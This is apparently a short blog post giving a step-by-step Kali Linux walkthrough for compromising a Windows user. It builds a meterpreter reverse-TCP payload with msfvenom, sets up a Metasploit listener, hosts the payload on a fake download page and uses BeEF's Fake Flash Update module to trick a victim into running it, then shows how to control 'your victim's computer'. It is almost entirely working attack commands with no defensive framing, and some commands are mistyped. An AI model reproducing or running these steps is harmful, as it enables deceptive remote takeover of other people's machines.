root@kali:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=443 x > /root/Desktop/payload.exe
root@kali:clear
root@kali:cd /usr/sharebeef-xss/
root@kali:./beef
Open msfconsole
msf>use exploit/multi/handler
msf>exploit(handler)>show options
msf>set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf>exploit(handler)>set LHOST 192.168.1.105
LHOST=>192.168.1.105
msf>exploit(handler)>set LPORT 443
LPORT=443
msf>show options
msf>exploit
make simple fake download page
transfer created payload from desktop to var/www/html
copy Hook URL:[ip address] from ./beef results and pased it in index.html
index.html from var/www/html [see screenshot below]
visit the BeEf website UI [192.168.1.105:3000/ui/panel - can view from ./beef results]
login beef/beef usernamea and password
open cmd:
root@kali: service apache2 start
open browser and type 192.168.1.105
go to BeEF Control Panel from browser tab
select online browsers>192.168.1.105>192.168.1.105>click Commands tab
click Social Engineering folder>select Fake Flash Update
update image: http://your ip
update custom payload URL: http://your ip
click execute
once victim will download it.. youll recieve a meterpreter session.
to interact with the meterpreter session just type:
sessions -i L
[this will interact with the meterpreter session "l", if you want to see a list of sessionts just type: sessions]
type "Help" or "?" to have a full list of usefull commands to control your victim's computer]
No comments:
Post a Comment